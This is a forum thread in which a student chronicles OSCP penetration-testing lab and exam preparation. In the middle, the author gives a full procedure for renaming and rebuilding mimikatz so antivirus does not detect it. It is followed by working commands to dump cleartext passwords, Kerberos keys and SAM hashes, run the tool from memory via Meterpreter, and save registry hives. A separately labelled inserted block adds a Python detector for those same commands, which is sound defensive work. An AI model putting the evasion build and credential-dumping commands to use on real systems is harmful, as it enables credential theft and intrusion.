This command took about 4 minutes to complete, and the open ports lit up like a Christmas tree. I didn’t really have any idea or preference of which host to attack first, and seeing so many open ports on so many machines, I figured the simplest approach would be to start at the lowest IP and work my way up through the IP addresses.

I started with the first IP address. After enumerating the host, I found a vulnerability I could exploit. I didn’t want to use Metasploit for this because I would learn more doing things by hand first. I didn’t start up my listener before I fired off my fumbled attempt to exploit and this resulted in a denial of service on the machine: I crashed it by accident and had no way to reset it. I didn’t have a GUI panel available to reset hosts since I was only supposed to be testing the VPN connection.

After this silly mistake I decided to change my attack methodology, mainly because I want to maximize my time in the labs and exploit every host: I will use Metasploit for mundane tasks like reverse shells, simple fire-and-forget exploits and uploading files through Meterpreter. After I complete the labs and if I still have time left, I will repeat the exploits by hand.

I then moved on to the next host which I expect will require some form of brute-forcing. I was looking for something a little more meaty than building a word-list and running a brute force tool against a server so I proceeded to the next IP in the list. My next target was called Bob, and I had a great time breaking into Bob. I went to bed 2 hours later than I had planned to, I just couldn’t get myself to go to bed knowing I could solve this puzzle. My persistence paid off, and after about 3 hours of puzzling and taking notes and screenshots, Bob was mine.. and it felt great! I looted the box, left behind the digital equivalent of graffiti (a “Jollyfrogs.txt” file with some words of wisdom) and logged off from the VPN, tired but extremely satisfied.

Being the first host I exploited to system/root level, it certainly will be a name I will remember. I didn’t have time to look at other hosts but Bob made me realize that my generic approach works which is a relief.

My exam starts Sunday the 21st of June (next week) and I’m excited to start!

Originally Posted by MrAgent:

Good thread so far. Keep it up! How much time did you sign up for?

Hi MrAgent, I signed up for 90 days.

Originally Posted by the_Grinch:

Awesome posts! Let me just commend you on all the work you have done prior to signing up. What’s your background?

Originally Posted by JoJoCal19:

This thread is great! Thanks for all of the info JollyFrogs. Also like the_Grinch, I’d like to know what your background is. Also if it wouldn’t be too much trouble, can you list the sources, links, book names, you used to learn these pre-sign up skills? It would be beneficial to myself and others looking at the OSCP.

Hi The_Grinch and JoJoCal19, I started using computers when I was 7 when my dad bought a Commodore 64 for the family. Although a family gift, none of my family members were interested in computers so I had plenty of time to get acquainted with BASIC and of course play the many games that I was trading with friends. There was no internet back in the days and most programs would be loaded from music cassettes (magnetic tape is still used today to store information for instance in DLT tapes). I remember tuning in to radio shows that broadcast code which you could record onto cassette and then load in the computer. We’re talking WarGames era here where internet connections still made beeping and screeching noises. Of course my parents never allowed me to use the phone line so I was limited to one-way traffic from the public radio stations to my dad’s Pioneer radio system.

The above might make me sound old but I’m only 38 (I guess that statement is relative) and have worked with computers my whole life. When I was 20 I was poached by a large corporation to work on IBM Mainframes. This was in the late 1990’s and it was a time of plenty, back then companies would hire anyone to work on computers due to a global shortage of IT staff. I started off in “Tape Setup” department which was a large library of magnetic DLT tapes, and we would be working in shifts 24-hour around the clock, watching 3 screens with “batch job requests”, essentially tape ID numbers, and run to the correct tape readers to insert these tapes. I have fond memories of Tape Setup. The Tape Setup also served as a prospective pool of future Mainframe operators, and after a few weeks there was an opening as a Mainframe operator in the systems team. I applied and was hired. I worked with mainframes in shifts for around a year and was poached internally by a visionary manager who had just started the “Windows NT department”. Our mainframe computer terminals were being replaced by NT workstations at a very fast pace and their department couldn’t keep up. I got a job as an NT server administrator. They gave me an MCSE NT 4.0 course and I certified. Shortly after, I was among the first people in the world to certify for Windows 2000 (The only reason I know this is because I received a signed “early achiever” reward from Bill Gates). My manager allowed me to study almost non-stop as long as I kept the servers running. I was responsible for about 70 Windows NT servers, and they all ran like clockwork, so I had plenty of time to study.

(Shortening the story a bit here) After a few years in the Windows server department, I realized that my days as a server administrator would soon be coming to an end as more and more of our systems support was being outsourced to India. As Darwin once said, “It is not the strongest species that survives, but the most adaptable”. So I got Cisco certifications and applied for a job in networks support, which I did for a few years. When networking started to get off-shored and outsourced, and with the rise of “the cloud” which virtualizes most of the networking equipment I was supporting, I got into security. Security came naturally to me as most of my setups would take it into account, and having a broad basis of systems knowledge and networks really helped ease the learning curve. I got CISSP certified, did some contracting and freelancing and have settled in an information security job in Brisbane for about a year now. I’m enjoying security and believe this will be my last career switch, having switched twice within the IT field.

Over the years I have gotten quite a few certifications, partly thanks to employers who saw the benefit in training their staff but mostly because I self-study at home almost every day - I enjoy it and I crave it. My list of certifications includes CCNP, CCDP, CCVP, MCSE, MCDBA, CISSP (the list is quite extensive but those would be my preferred ones; the ones I learnt most from or have gotten most value out of during my career). Every 2 years I get another Cisco certification simply to keep my certs active, the Windows certifications don’t expire and I need 40 CPE points per year for my CISSP accreditation. Unfortunately the value of these certifications has dropped significantly with the up-rise of brain-dumping sites. And that is why I’m doing OSCP now! It’s hands-on. No cheating and no brain-dumping: This is a journey that people take alone. This is the “Camino de la Sabatera” of the IT certifications: I will value this certificate more than any of the ones I have gotten so far (except perhaps my early achievers award from Bill Gates!). I have learnt so much already even before starting the course.

Overall I would rate my knowledge coming into the OSCP studies as follows:

  • Networks = excellent
  • Microsoft = excellent
  • Linux = moderate
  • Coding = moderate
  • Scripting = moderate
  • Security (theory) = moderate
  • Security (practical) = moderate
  • Assembly = low
  • Python = zero
  • Linux Kali = zero
  • Metasploit = zero

I will list the resources I used to get up to speed in a separate reply. I’m on 904 pages of notes so far in KeepNote so I will just get the most important links that I used.

EDIT: I posted the links, but I guess the sheer volume of URLs resulted in the post being marked for review by a moderator. If it doesn’t get approved - which due to the hackish nature of some of the links is completely understandable - then I will post a pastebin link instead.

As requested, here is a non-exhaustive list of resources I have used so far. Please keep in mind that some of these links have hundreds or thousands of links in them, most of which I would have read. A good resource to start out is the very first link on this website, which has hundreds of interesting links.

Be warned: This rabbit hole goes deep.

Interesting reading:

Exploit and vulnerability databases:

Restricted shell escape:

Privilege Escalation:


Boot to root websites:

Pentesting blogs:

Reconnaissance websites:

Shell codes:

Tools to hide Shells:


Exploit Development:

Password leaks/lists:

OSCP reviews:

Hash cracking:

Bob was a great experience, one thing was bugging me though: When I ran mimikatz “it didn’t work”. No output, nothing. The command ran then exited without errors. I now know that the desktop must have been full of error dialogs, let’s hope Bob wasn’t using his computer when I did.

I had compiled mimikatz from source, and I wondered if that might have broken something. So I fired up a Windows XP SP0 machine and tried the pre-compiled mimikatz version from the inter-webs. Sure thing, the program worked flawlessly. I then ran my compiled version - which I thought should be identical - and when executing mimikatz I got an error screen on the desktop stating a “DecodePointer” function in Kernel32.dll couldn’t be found. I did some research on this error and learnt that the DecodePointer function was only added to kernel32.dll after Windows SP2: Mystery solved! I added the DecodePointer function to the solution, built it, fired up mimikatz on my Windows XP SP0 machine and it worked.

A minor inconvenience was that my antivirus would pick up Mimikatz as malware and delete the file. I proceeded to change the mimikatz code very slightly and I’ve come up with a version that my antivirus doesn’t detect (yet) as a virus. I’ve attached the complete procedure below in case someone wants to compile Mimikatz from source and runs into the same issue:

Author: JollyFrogs, Brisbane

NOTE: Disable all virus-scanners before you start downloading, keep them disabled until your files are compiled

Get the required programs and files:

Install Driver Development Toolkit:

Extract GRMWDK_EN_7600_1.ISO with 7-zip

Run KitSetup.exe

  • Click Yes to start the installation
  • Tick “Full Development Environment” and leave all other options unticked
  • Click “OK” in the bottom right
  • Install path: C:\WinDDK\7600.16385.1\
  • Click “OK” in the bottom right
  • Tick “I Agree” in the bottom left and click “OK”

NOTE: The installation commences

  • Click “Finish” in the “Microsoft WDK Install Progress” screen

Install Visual Studio 2013 Community Edition:

Extract vs2013.4_ce_enu.iso with 7-zip

Run vs_community.exe

  • Click “Continue” if you get a setup warning
  • Install path: C:\Program Files (x86)\Microsoft Visual Studio 12.0\
  • Tick “I agree to the License Terms and Privacy Policy.”
  • Untick “Join the Visual Studio Experience Improvement Program”
  • Click “Next”
  • Tick and then untick “Select All” to select nothing
  • Click “INSTALL”
  • Click “Yes” to close the UAC warning screen

NOTE: the installation commences

  • Click “LAUNCH” after install completes
  • Click “Not now, maybe later.” in the Welcome screen
  • Select “General” and Select “Blue” and Click “Start Visual Studio”

Prevent AV detection on Mimikatz:

Extract mimikatz-master.zip to C:\jollykatz\ (you should end up with “C:\jollykatz\mimikatz-master\mimikatz.sln” and a whole bunch of files/folders)

Run the following in a cmd.exe to rename all files and folders from “mimi” to “jolly”:

powershell.exe -noprofile -command "1..10 | % {Get-ChildItem c:\jollykatz\ -Filter \"*mimi*\" -Recurse | Rename-Item -NewName {$_.name -replace 'mimi','jolly' }}"

powershell.exe -noprofile -command "1..10 | % {Get-ChildItem c:\jollykatz\ -Filter \"*kuhl*\" -Recurse | Rename-Item -NewName {$_.name -replace 'kuhl','frog' }}"

run fnr.exe with following settings:
Dir: C:\jollykatz\
Tick "Include sub-directories"
File Mask: *.*
Find: mimi
replace: jolly
Click "replace"

run fnr.exe with following settings:
Dir: C:\jollykatz\
Tick "Include sub-directories"
File Mask: *.*
Find: kuhl
replace: frog
Click "replace"

run fnr.exe with following settings:
Dir: C:\jollykatz\
Tick "Include sub-directories"
File Mask: *.*
Find: eo.oe.kiwi :)
replace: THINC.local
Click "replace"
Close fnr.exe

Copy "EncodePointer.lib" to C:\jollykatz\jollykatz-master\lib\Win32
Copy "EncodePointer.lib" to C:\jollykatz\jollykatz-master\lib\x64
NOTE: We're adding "EncodePointer.lib" because WinXP SP0/SP1 would error out with a DecodePointer error caused by compiling with VS2013

Now we’ll build “Jollykatz”:

  • Double-click on “C:\jollykatz\jollykatz-master\jollykatz.sln”

NOTE: Visual Studio Community Edition opens your project

  • In the “Solution Explorer” window on the right, expand “global files” -> “lib” -> right-click on “Win32” and select “Add” -> “Existing Item”
  • Choose “C:\jollykatz\jollykatz-master\lib\Win32\EncodePointer.lib”
  • In the “Solution Explorer” window on the right, expand “global files” -> “lib” -> right-click on “x64” and select “Add” -> “Existing Item”
  • Choose “C:\jollykatz\jollykatz-master\lib\x64\EncodePointer.lib”

  • In the “Solution Explorer” window on the right, right-click on “jollykatz” (might have to scroll to bottom) and select “Properties”
  • Expand “Configuration Properties” -> “General” -> Set “Use of MFC” to “Use Standard Windows Libraries”
  • Click “Apply” in the bottom
  • Expand “Configuration Properties” -> “C/C++” -> “Code Generation” -> Set “Runtime Library” to “Multi-threaded (/MT)”
  • Click “Apply” in the bottom
  • Expand “Configuration Properties” -> “Linker” -> “Input” -> Add “EncodePointer.lib;” at the start of “Additional Dependencies” (in front of “advapi32.lib”)
  • Click “OK” in the bottom

  • In the top menu bar, click “Build” -> “Rebuild Solution”

NOTE: You should see “Rebuild All: 3 succeeded, 0 failed, 0 up-to-date, 0 skipped”

NOTE: This means that the 32-bit build succeeded!

  • In the top bar, next to “Release”, change “Win32” to “x64”
  • In the top menu bar, click “Build” -> “Rebuild Solution”

NOTE: You should see “Rebuild All: 3 succeeded, 0 failed, 0 up-to-date, 0 skipped”

NOTE: This means that the 64-bit build succeeded!

NOTE: You should now see 5 files in the C:\jollykatz\jollykatz-master\Win32\ directory, of which you will need 3:

  • jollykatz.exe
  • jollylib.dll
  • jollydrv.sys

NOTE: You should see the same file structure in the C:\jollykatz\jollykatz-master\x64\ directory

Copy and rename C:\jollykatz\jollykatz-master\Win32\jollykatz.exe to C:\jollykatz\jollykatz32.exe

Copy and rename C:\jollykatz\jollykatz-master\x64\jollykatz.exe to C:\jollykatz\jollykatz64.exe

NOTE: Typically, you only need jollykatz.exe, the driver (jollydrv.sys) and library (jollylib.dll) files are optional. If you need the drivers, copy and rename them as well.

NOTE: Hopefully, your antivirus won’t pick up on the new jollykatz.exe files. If it does, you’ll need to modify some code. Or use the Veil framework.

Run Mimikatz from memory through meterpreter (advisable):

execute -H -i -c -m -d calc.exe -f jollykatz.exe -a '"privilege::debug" "sekurlsa::logonPasswords full" "exit"'

How to use:

-- dump clear-text passwords from LSASS process:
C:\> jollykatz32.exe "privilege::debug" "sekurlsa::logonPasswords full" "exit"

-- Steal users credentials until they reset their passwords:
C:\> jollykatz32.exe "privilege::debug" "sekurlsa::ekeys" "exit"

-- Dump LM and NTLM hashes from SAM:
C:\> jollykatz32.exe "privilege::debug" "token::elevate" "lsadump::sam" "exit"

-- read SAM file from /repair or ntbackup files:
C:\> reg save HKLM\SYSTEM SystemBkup.hiv
C:\> reg save HKLM\SAM SamBkup.hiv
(Or use Volume Shadow Copy / BootCD to backup these files or get them from the repair folder :)
C:\> jollykatz32.exe "lsadump::sam SystemBkup.hiv SamBkup.hiv" "exit"
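Added example from the defender's side (not part of the original post): the usage lines above pass the same `module::command` arguments whatever the executable is called, so process-creation logs (Sysmon Event ID 1 or Security 4688 with command-line auditing) can be matched on those arguments and on the `reg save` hive dumps instead of on the file name. The event records, host names and severity labels below are constructed assumptions.

```python
import re
from collections import defaultdict

# module::command arguments taken from the usage lines in the post.
# The severity labels are an assumption made for this example.
MODULE_COMMANDS = {
    "privilege::debug": "medium",
    "token::elevate": "medium",
    "sekurlsa::logonpasswords": "high",
    "sekurlsa::ekeys": "high",
    "lsadump::sam": "high",
}

# Any word::word token; only those listed in MODULE_COMMANDS are reported,
# so C++-style arguments such as std::string are ignored.
TOKEN_RE = re.compile(r"\b([a-z]+::[a-z]+)\b", re.IGNORECASE)

# "reg save" of the SAM or SYSTEM hive root (not a subkey below it).
REG_SAVE_RE = re.compile(
    r'\breg(?:\.exe)?"?\s+save\s+"?(?:hklm|hkey_local_machine)\\(sam|system)(?=["\s]|$)',
    re.IGNORECASE,
)

# Constructed process-creation records (host, image path, command line).
SAMPLE_EVENTS = [
    {"host": "WS01", "image": r"C:\jollykatz\jollykatz32.exe",
     "cmdline": r'jollykatz32.exe "privilege::debug" "sekurlsa::logonPasswords full" "exit"'},
    {"host": "WS02", "image": r"C:\Windows\System32\reg.exe",
     "cmdline": r"reg save HKLM\SYSTEM SystemBkup.hiv"},
    {"host": "WS02", "image": r"C:\Windows\System32\reg.exe",
     "cmdline": r"reg save HKLM\SAM SamBkup.hiv"},
    {"host": "WS03", "image": r"C:\Windows\System32\reg.exe",
     "cmdline": r"C:\Windows\System32\reg.exe save HKLM\SYSTEM weekly.hiv"},
    {"host": "WS04", "image": r"C:\Windows\System32\reg.exe",
     "cmdline": r"reg save HKCU\Software\Example settings.hiv"},
    {"host": "WS04", "image": r"C:\tools\cl.exe",
     "cmdline": r"cl.exe /EHsc /DTYPE=std::string main.cpp"},
    {"host": "WS04", "image": r"C:\Windows\System32\reg.exe",
     "cmdline": r"reg query HKLM\SYSTEM\CurrentControlSet\Services"},
]


def classify(cmdline):
    """Return a sorted list of (rule, severity) hits for one command line."""
    hits = set()
    for token in TOKEN_RE.findall(cmdline):
        severity = MODULE_COMMANDS.get(token.lower())
        if severity:
            hits.add((token.lower(), severity))
    match = REG_SAVE_RE.search(cmdline)
    if match:
        hits.add(("reg-save:" + match.group(1).lower(), "medium"))
    return sorted(hits)


def triage(events):
    """Group hits per host and raise severity when signals combine."""
    per_host = defaultdict(lambda: {"rules": set(), "images": set()})
    for event in events:
        for rule, _severity in classify(event["cmdline"]):
            per_host[event["host"]]["rules"].add(rule)
            per_host[event["host"]]["images"].add(event["image"])

    report = {}
    for host, data in per_host.items():
        rules = data["rules"]
        credential_cmd = any(MODULE_COMMANDS.get(r) == "high" for r in rules)
        # SAM and SYSTEM saved on the same host is the pair needed to
        # read the hashes offline, so treat the combination as high.
        both_hives = {"reg-save:sam", "reg-save:system"} <= rules
        report[host] = {
            "severity": "high" if credential_cmd or both_hives else "medium",
            "rules": sorted(rules),
            "images": sorted(data["images"]),
        }
    return report


if __name__ == "__main__":
    for host, entry in sorted(triage(SAMPLE_EVENTS).items()):
        print(host, entry["severity"], entry["rules"], entry["images"])
```

The image path is recorded for the analyst but never used for matching, which is why the renamed executable on WS01 is still reported.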

My lab access starts upcoming Sunday at 10:00 AM Brisbane time, in two days! I feel excited like I was as a kid a few nights before Christmas. The sneak peek during the VPN test confirmed my methodology works for at least one host, and this has provided me with confidence to build on my initial methodology.

Over the last few days I’ve mostly been working on windows scripts targeting looting and privilege escalation. I haven’t put any preparation time in Linux, databases or web applications, so I’ll have to get up to speed during lab time. It is my intention to share the scripts I create during my OSCP lab adventures once I confirm they work in the labs.

“How do I ensure that I don’t spoil any of the fun for other OSCP students while still sharing my experience in a meaningful and interesting way?”. This is a question that I haven’t been able to answer yet, but as I move forward into the labs, I am sure I’ll find a good balance between providing useful information and spoiling.

Just a quick write up that I’ve started, the email was received at exactly 10:00 AM this morning, so it must be an automatically scheduled tool that sends the email, no complaints here I was happy to see the email. Username and password to connect via OpenVPN are the same as during the connection test, so if people don’t get the email at the right time (due to spam filters, or not being able to access their email account for some reason) then they can probably just login with the same details they used to test the connection. IP hasn’t changed either, I still have the same dynamic IP I got when I tested, so that saves me time recompiling some of my scripts.

I took down Alice today. And I reset Bob and had another go at him since I forgot to get the “proof.txt” files. I took down Bob2 as well but that’s not really saying much as they are copies (there are copies of “popular” machines so you can use either the main one or the secondary, very nice of OffSec). The proof.txt key is different though, so since I was going for 100% of the labs, I’ll need to get all the machines AND their secondaries.

Resetting hosts is a matter of 10 seconds and the image has been reset. This is needed for computers that rely on “risky” exploits like… well when I crashed Alice. You get 8 resets per day, so use them at will.

Total hosts down so far: 3

What a rush, I just rooted my first Linux machine! I got stuck on a very difficult one, and while running some time-intensive scans on it, I decided to scan another host, BOOM rooted it, and my other scan isn’t even completed yet! Granted it was an easy exploit but it still feels good!

Total hosts rooted so far: 6

Turns out the machine that had me stumped for the last few days was ghost. Ghost is Bob’s (much) sneakier brother and it took me a while to figure out the puzzle. I spend approx 2-3 hours after work on the labs. I keep notes of everything I try, and at 20:30 sharp I call it a day. I could go on the whole night of course, but the long term strategy is to not lose sleep over it. After all, this is brain-work and sleep is essential to keep my head in the game.

After popping around 7 boxes total, I decided to change my tactics. I had gathered about 15 full credentials, 25 userIDs and 20 passwords in total and I needed to learn Hydra, Medusa, NCrack and all the other brute-force goodies in the software. So how did it go? Well… to be honest, not very successful. I did learn a great amount of things though: Don’t run brute-force tools over VPN. The VPN totally kills the speed (Hydra will do about 800 tries per minute on a webserver for instance). Instead, it’s much better to use the dedicated Windows machine you get in the labs to run a Windows version of Hydra on and let it run in the background while you do other things.

That said, I have not (yet) been able to find a single password. I know my commands work because if I add a password (that I found via other means) to the list, it finds the password. Brute-forcing is slow, prone to being detected and blocked, locks out accounts permanently with ease, and my main lesson from all this is that it should be used as a method of last resort and not an easy win as I hoped it would be. Strangely, brute-forcing is not nearly as rewarding as to crack a puzzle with brain power. Not to say it can’t be effective, but I won’t be relying on it as much as I had initially planned to.

And now, a bit of fun: “JollyFrogs’ Pwn Difficulty Rating”:

  • 1 = Obvious misconfiguration that leads to compromise without skill or scripting (empty pass/post-its with passwords)
  • 2 = All above + Use of precompiled public exploits without modification or compilation (ie: Script kiddies, Metasploit module)
  • 3 = All above + Use of modified exploits which lead to root access (msfvenom)
  • 4 = All above + Use of fuzzing and password/hash cracking which lead to root access
  • 5 = All above + exploits only lead to low privileged account and requires root privilege escalation
  • 6 = All above + protection evasion (AV/IPS/ASLR/DEP), write or disassemble simple code
  • 7 = All above + chaining advanced exploits, network pivoting, vlan hopping, arp poisoning, or MITM
  • 8 = All above + disassembly, debugging and reverse engineering complex and/or protected code
  • 9 = All above + Requires creation of new 0day exploit, a new hacking or cracking methodology and expert knowledge in the targeted application
  • 10 = Hack the Matrix

Jollyfrogs 1 - Ghost 0

Total hosts down so far: 9

Had to do overtime yesterday on an important project so didn’t get to do any puzzling. I’ve got the whole day today to puzzle, and I’m going to spend the next few hours with Phoenix. I’m learning lots, mostly from google at this point as I’m stuck on the system while trying to escalate privileges. I know “the trick” to escalate, but stringing all the bits and pieces together is proving very time consuming indeed.

Every time I’m getting closer, I realize that the goal was much further away than I originally thought. The word “mirage” would have been an appropriate word for the experience I’m going through now. I now realize that what I thought was the hard part (getting a limited shell) now seems to have been the easy part. All good fun though, I’m thoroughly enjoying finding the key and will let you know when I found it.

Edit: Thanks Phoenix, you taught me a few valuable lessons! Jollyfrogs 1 - Phoenix 0

Total hosts down: 12

This is my second week of lab access and I’m thoroughly enjoying the labs. So many hosts, so much to do, puzzles everywhere! I’ve been on a roll lately, having fine-tuned my approach. During the week I don’t have much time and if I can put in 2 hours it’s a lot. During weekends I spend about 10 hours per day. I find my original methodology still works, it’s sound and makes sense. I have refined it somewhat and will post all my experiences in the labs as I’m keeping notes. I’ve written around 2000 pages of notes so far! I find that making screenshots isn’t as handy as just copy/pasting the actual exploit although I believe OffSec wants at least one screenshot per host.

I’ve made a “quick admin access” doc where I can quickly RDP to the hosts or SSH to the hosts using admin passwords that I have recovered. I found that I have used the file more than I expected, going back and forth between hosts. For instance, recently I required a MySQL database, so I fired one up on one of the hosts I had root access on. Haven’t touched Humble/Sufferance or Pain yet, as I’m still plucking the low hanging fruit.

24 hosts down

1 secret network

Well, it’s the third week in my labs.. and these boxes are definitely getting harder. Currently stuck on Bethany, she’s proving to be a real tease!

Status:

Total hosts down: 28

Networks unlocked: 2

Hi Guys,

Absolutely still on track and Bethany just fell. So far Bethany was the hardest of all machines I’ve tried, followed by Gh0st, and then Pedro. Pedro mainly because I got stuck in a loop of confusion. I can’t give out any details obviously other than that I should have been more patient with Pedro, and it would have been an easy machine.

I’m now running into machines that have dependencies on other machines, and I never bothered to run netstat -ano commands, so I will have to go back to ALL the machines and netstat and tcpdump to see who “talks” with who. Not today though, I’m finding out how to use proxychains, very interesting stuff (I resorted to reading the PDF because proxychains was well beyond my knowledge area and can be really confusing to use). I am now running my very first network scan via proxychains, so far so good!

Don’t worry boys, I’m keeping track of all the resources and when I have time, I will sort out the spoilers from the useful stuff and post all the useful stuff in this thread. I’m installing additional tools and programs on my Kali machine almost daily, and keeping a record of the full installation manual which I’ll share when I get the idea I have all the tools I need

Bethany 0 - Jollyfrogs 1

Just a quick heads up that I’m still on the OSCP trail. Have had 2 weeks off due to work related developments and busy projects, but I’m back in the OSCP mindset now. I find that it’s hard to spend 2 hours per day during the week, the time to “get in” to a system takes about 1 hour, then to “wind down” it takes another 15 minutes so realistically I only get 45 minutes out of it. I’ve decided to spend more time on weekends (12 hours each day) and less during the week so I am rested during weekends. This seems to have worked for me so far (on average during a weekend I will solve 10 easy machines or 1 hard one).

Met a nice guy on irc.osswg.com #OSCP channel called Mokaz. It really helps to motivate each other to get further and tackle the harder machines. Someone on the IRC channel gave a hint (not a solution, but a very generalistic hint as in “you might need to compile more than a single sploit to beat this one” kind of thing), which completely put us on the wrong track for one of the machines. Perhaps there is more than a single way to tackle a machine.

I’ve updated my installation document again which I believe is now ready for distribution. You can find it here: Jollyfrogs OSCP installation guide 1.03 - Pastebin.com

Pain 0 - Jollyfrogs 1

I had a good day today, pwned 5 boxes. I was getting stuck in boxes that simply wouldn’t budge, and decided to go back to some older boxes I had gotten a while back when I started. I noticed some machines were talking to each other, and I was able to utilize this to unstuck myself. I have a few boxes left in the public network and starting to think I might have to move on to the two other networks soon. I still have a few boxes to check for dependencies, after which I’ll move on. I’ve started writing a bash script to automate some privesc tasks.

It’s been quite a while since I posted and the main reason for that is that I have been very busy in the labs. I can now proudly say that my first personal goal has been achieved: I have broken into all of the lab machines! Humble, Sufferance, Jack, Cory, Bethany: All of them have fallen!

When I started, I honestly didn’t know if 90 days would be enough. Around the 20-25 machines mark I started getting stuck. It took me a while to figure out the relationships between the machines, and I had to go back to each machine and run netstat -antp ( -ano ) to get most of the relationships. Cory was elusive but with a hint from an IRC member I was able to find the clue that would lead to Cory’s downfall. I never made that Visio diagram because my notes were accurate enough for me to understand the relationships in the labs. During the course I have never had a single moment where I regretted taking notes in the way that I did. I was able to quickly find the information I needed at any time, despite the fact that KeepNote does not have a (useful) search function.

I met some friendly people on the IRC channel, some of whom I worked together with on some of the harder machines like Sufferance and Humble. This saved a lot of time. I could run one particular scan or try a particular method on a machine, and my partner in crime would run another. We never gave anything away, and the hints were cryptic at best. The hints in the IRC channel are mostly completely useless although some hints help. To hear that Bob is laughing at you won’t really help in cracking him. I further learnt that Bob2 is laughing at me, 2.

So now that I’ve done all the machines, I have to say that none of them were particularly hard. The difficulty was in finding the correct exploit. Most of the exploits I used worked out of the box or required very minimal changes like changing a port number.

Some further advice is to revert the machines before you try your exploit. Some exploits will only work once. It’s easy to forget to do this after having a chain of 5 machines and then running into this one single machine where an exploit “should work” but doesn’t. It’s easy to miss a port in your scans if the service crashed after another student exploited it. Sometimes a password won’t work because a student reset it. The lesson is to revert your machine before you start. If you need extra reverts, just ask an admin in the IRC channel, they will give you 8 extra reverts per day (for a total of 16). I used all my remaining reverts before the next cycle so I never let any revert go to waste. Even if you revert a machine and simply run a port scanner in the background and nothing else, it will be worth it. I would only attack machines that I had scanned after a clean scan. I figured I wouldn’t do more than 8 machines a day anyway, so this matched quite well. And when I needed more reverts I would ask an admin to give me additional reverts. The admins are quite helpful contrary to what is being said on forums. I have yet to hear anyone say “Try Harder” in the IRC channel. In fact, most of the time the IRC channel is quiet because people are busy in the labs. You can keep track of which machines people are working on by keeping track of the ! commands. For instance, if you see someone type !bob then you can be fairly certain that this person is working on Bob. This is how I found people working on !humble and !sufferance. I’d then start a private conversation with them and ask if they were working on that particular machine and if they wanted to work together on it. I haven’t been declined assistance on a machine during my lab course and some people will freely give tips when required. I gave quite a few tips myself to others in the forums. If you see someone struggling on Bob for more than a week you tend to want to give them a hand. Not give it away mind you, but at least tell them if they are looking in the right direction.

I now plan to re-do at least half of the machines which I did the “easy way” the hard way. Some (most?) machines have an easy hack and an additional difficult way in. I’ve done most machines the “easy way” and now plan on doing them the hard way.

So how many times did I use brute-force? Once… and it was a big waste of time. You can do each and every machine without brute-forcing. I did use hashkiller.co.uk a lot though, and used default user credentials on some systems (hardly a brute force). There was a single machine that could be considered a brute-force but wasn’t really (I can’t give more details sorry!). After having gotten some of the passwords I do believe that brute-force MIGHT be a viable approach for some machines, but it is not required.

I’ll post more about my documentation methodology, approach to hacking the boxes, and my upcoming exam soon!

Edit: new v108 guide is out!

Hi ada

I think that the minimum experience levels are:

  • Linux: Medium knowledge, comfortable with the command line. You’ll need to know the following commands and what they do:

    netstat, ifconfig, chown, chmod, cat, simple bash scripts, the difference between a pty limited shell and a full interactive shell, gcc and how to compile simple programs on Linux, grep, tcpdump. What is the passwd file and what is the shadow file and how do they relate? How do you add a new user with root privileges on Linux via the command line? One thing you can do is replace your Windows desktop with Ubuntu and you’ll get the hang of it in no time. (Ubuntu because it’s Debian based, which is the same as Kali). Or you can run Kali as your workstation. See installation guide above.

  • Windows: Medium knowledge. Know the various ports and what they do. For instance, if you see a scan in nmap with 3389 open you can be fairly sure it’s a Windows machine since that port is RDP. Know what services are installed by default. Know how to write simple powershell scripts (one-liners). Know the difference between an elevated command prompt and a non-elevated one. Some commands you will need to know: ipconfig, netstat, cmd, find, sc, vss. How do you add a new administrator user via the command line?
  • networking: Low knowledge: know what an ip address is, how various protocols work like ping, how firewalls can block traffic (in general), the difference between refused/blocked/timedout packets. know how to read a basic tcp handshake session in wireshark.
  • coding/scripting: Low knowledge: although Ruby/Python experience is not required in my opinion, it will help with the course. Generic programming knowledge however will be needed. You should be familiar with coding and using variables, using command line arguments, replacing small bits of code. Check out exploit 643 on exploit-db: you should be able to understand what’s going on. If you can’t understand what that code does, you’ll need to brush up on your coding. Please note that that piece of code is quite complex and most exploits written in python are easier to understand. What does the shellcode portion do? What do memset, strcat and malloc do? What kind of packet would it send, what would it look like? If you can’t answer those questions, you’ll probably need to brush up your coding.

I don’t think anything else is required and you will pick up things as you go during the course. Even if you don’t fully understand the code, you can start the course and you will learn doing the course. I had never run a Python script or Kali before starting the course, although I did have some Linux experience (CentOS and Ubuntu) and general coding experience (C++)

[Quote] Originally Posted by MrAgent

Will you be taking the exam anytime soon JollyFrogs?

I’m planning to schedule the exam sometime in September. I’m still going through the lab notes and re-doing some of the machines in another way, and I still need to prepare my report so that it is ready (as much as possible) for the exam.

[Quote] Originally Posted by dookdook

JollyFrogs! Well done man, all the boxes. That’s impressive. I start on Sunday in the labs, and just getting my VM ready, so following your latest guide. So no issues at all using Kali 2.0 with the course then?

Hi Dook,

I released a v108 guide that fixes an annoying slow shutdown issue in v107. This will be the last installation guide for a while, it seems this v108 is very stable (I redid a clean install using it, no issues).

JollyFrogs OSCP PWK Kali 2.0 installation guide v108 - Pastebin.com

Yes, you can use that install in the labs, I had no issues on any machines with this setup.

Yesterday, I concluded my OSCP adventure! Although I haven’t received official confirmation yet, I was able to pwn all the machines in the labs. And with that, achieve my personal goal that I made many months ago before even signing up to the course: Owning 100% of the lab machines and passing the exam with a 100% score. I’m really pleased with this result. I learned plenty during this exam, I dare say more than any other exam I have completed (and there are quite a few!).

I really looked forward to the exam. The chance to have a go at an extra 5 machines was an exciting prospect. The labs prepared me well for the experience and I wasn’t fearful or worried and I had a really good sleep before the exam. My exam was booked for 07:00 AM and my partner worked from home to provide mental support. I had set up an auto-forwarder on my Outlook at work to forward the exam email, this didn’t work for some reason and I had to VPN into work and pick up the email manually. I manually forwarded the email to my gmail account and logged off work VPN. I used the Kali v108 machine, the installation guide of which you can find in one of my earlier posts. I have been able to do all lab machines, all exercises and the exam with this machine and the new Kali is a pleasure to work with after some minor UI tweaks (which are in the v108 guide as well).

The exam guide is a short PDF document which clearly explains the objectives of the exam. I was allocated a small number of machines to attack. The PDF explains in detail what is allowed and what isn’t allowed in the exam. In general, the use of automated tools is not allowed, however it is allowed to use msfvenom. I personally didn’t use the meterpreter at all during the exam, but you are allowed to use SOME functionality of the meterpreter. Don’t get too used to using meterpreter in the labs, and try to use the reverse tcp shells of msfvenom instead. Some of the allocated machines are worth more points than others, and you need to get a certain number of points to pass the exam. Offsec advises to fill in the lab report but I chose not to do this as it is not required. The only required deliverable is the actual exam report, for which Offsec will give you a Microsoft Word or OpenOffice template. The template is very well thought out and I recommend using it.

